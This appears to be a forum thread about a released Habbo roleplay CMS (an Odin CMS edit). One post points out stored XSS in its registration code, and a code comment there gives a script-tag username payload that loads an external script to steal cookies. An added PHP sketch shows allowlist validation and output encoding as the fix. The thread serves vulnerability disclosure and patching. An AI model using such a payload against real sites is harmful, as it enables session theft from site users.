Don't use it anymore.
Dev thread: https://forum.ragezone.com/f331/odin...l-oop-1063274/
Download: https://mega.nz/#!DxJhnQRJ!5QpRnQqxt...G-B3iaLdyswSqU
Love it, thanks Jonty!
- Gan
I am Spanish, but honestly I loved this CMS. I want to know what DB the CMS uses and which tables it uses; I would like you to answer me.
This CMS was coded to work with the emulator that Amp RP: Login uses. It's a bfly emulator turned into an RP emulator from 0 by Jonty, and I highly doubt he will release the emulator. If you want to use the CMS you will have to make it work with your own RP emulator and DB. And nice release Jonty, this is a clean and good CMS.
I bet there are exploits lol
ahh you released it, awesome release man.
I've looked at the source, looks like you have quite a lot of XSS vulnerabilities
you can also pick a username with the skull altcode, so nobody can ban or target you whatsoever
If I'm wrong, just tell me, but it looks like there's a lot of XSS exploits one can use, this is just one example.
Code:
$first_name = (isset($_POST["username"]) ? $core->Filter($_POST["username"]) : null);
//here it just filters the username, so blabla"blabla will become blabla\"blabla, nothing wrong with that, but you can still pick this name
if(is_null($first_name))
{
    $registerErrors[] = "You must enter a username.";
}
//just checks if it's null, nothing wrong with it
$full_name = $first_name;
if(!$users->CheckUsername($full_name))
{
    $registerErrors[] = "That username is unavailable.";
}
//Here it checks if there's the same username already, there's no check what characters you can use whatsoever
//you can just fill in <script src="http://whateverwebsite.com/blabla.js"></script> and steal some cookies!
you're correct, you can use special characters to create usernames already taken. this CMS is used on iHabiHotel and I patched the issues on his live copy of the CMS
After actually looking at this copy, I've discovered it's NOT the roleplay version I thought it was, this is an edit of odin cms for ihabi.net with issues patched on their live copy
should read the guy's post above mine, completely forgot about it. you should be checking for ctype_alnum if you know how. also you could strip tags, str_replace, or use regex to remove anything you don't want in the username. this is something I always overlook when coding a new cms
- - - Updated - - -
all good dude but please pay attention to my last post and also the post i quoted, this is not a finished product
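Added example, not part of the thread and not code from the CMS: a sketch of the username check suggested above (an allowlist regex standing in for ctype_alnum) together with HTML encoding at output, run over constructed sample names. The function names validateUsername() and e() and the 3-20 character limit are assumptions.

```php
<?php
declare(strict_types=1);

// Hypothetical helper (not from the CMS): allowlist check for a new username.
// Returns a list of error messages; an empty list means the name is accepted.
function validateUsername(?string $name): array
{
    if ($name === null || $name === '') {
        return ['You must enter a username.'];
    }
    // ASCII letters and digits only, 3-20 characters (assumed policy).
    // \A and \z anchor the whole string, so a trailing newline cannot slip
    // past the way it can with "$", and the result does not depend on the
    // process locale the way ctype_alnum() can.
    if (preg_match('/\A[A-Za-z0-9]{3,20}\z/', $name) !== 1) {
        return ['Username must be 3-20 letters or digits.'];
    }
    return [];
}

// Hypothetical helper: encode a value for an HTML text or attribute context.
// Escaping quotes for SQL (name\"name) does nothing for HTML output; this
// step is what stops a stored name from being parsed as markup.
function e(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// Constructed sample inputs: a normal name, the script-tag name from the
// post above, a name with a skull symbol, and a name that is too short.
$samples = [
    'Jonty2015',
    '<script src="http://whateverwebsite.com/blabla.js"></script>',
    "Admin\u{2620}",
    'ab',
];

foreach ($samples as $name) {
    $errors = validateUsername($name);
    $status = $errors === [] ? 'accepted' : 'rejected';
    // Always encode on output, including names stored before the check existed.
    printf("%-9s %s\n", $status, e($name));
    foreach ($errors as $error) {
        printf("          - %s\n", $error);
    }
}
```

Validation at registration does not clean up names already stored, so the encoding step has to stay in every template that prints a username.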
It is still based on an RP database, but it's easy to change and make it work as for any other emulator, you can finish it yourself too. The hard parts are already finished, and I really like this cms, I already fixed those XSS exploits too which is pretty much the only thing that was wrong with it, and @Matthew-the-man "I bet there are exploits" I highly doubt you even know what an exploit is m8, don't let your mind go with what other people say about Jonty, you shouldn't even try to trash talk a work of someone that is highly more advanced in coding than you are (if you even code of course)
I've changed the theme of the CMS and fixed nearly anything that was wrong with it. I've also recreated a few new addons for it. It is very malleable and I love it. I will post screenshots when I've got a finished product.
I found it funny how people take credits for the css and design etc. When I was the one who originally coded this